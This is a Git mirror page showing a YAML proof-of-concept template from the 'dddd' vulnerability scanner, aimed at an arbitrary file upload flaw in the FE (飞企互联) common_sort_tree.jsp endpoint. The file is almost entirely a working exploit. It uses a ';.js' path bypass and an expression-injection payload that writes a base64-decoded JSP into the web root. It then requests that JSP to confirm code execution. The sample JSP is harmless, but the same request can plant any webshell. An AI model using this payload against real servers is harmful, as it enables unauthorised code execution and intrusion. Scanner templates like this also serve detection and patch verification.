admin/dddd
1
0
Fork 0
mirror of https://github.com/SleepingBag945/dddd.git synced 2025-06-08 14:06:33 +00:00
Code Issues Packages Projects Releases Wiki Activity
dddd/common/config/pocs/fe-common-sort-tree-fileupload.yaml
SleepingBag945 9a83a1b39f dddd v2.0
2024-04-03 06:32:26 +02:00

30 lines
929 B
YAML
Raw Blame History

id: fe-common-sort-tree-fileupload
info:
name: 飞企互联FE common_sort_tree.jsp 任意文件上传
author: SleepingBag945
severity: critical
variables:
filename: "{{to_lower(rand_base(10))}}"
http:
- raw:
- |
POST /common/common_sort_tree.jsp;.js HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
rootName={%25Thread.@fe.util.FileUtil@saveFileContext(new%20java.io.File("../web/fe.war/{{filename}}.jsp"),new%20sun.misc.BASE64Decoder().decodeBuffer("{{base64("<% out.println(111*111);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>")}}"))%25}
- |
GET /{{filename}}.jsp;.js HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- contains_all(body_2,"12321") && status_code == 200
Reference in New Issue View Git Blame Copy Permalink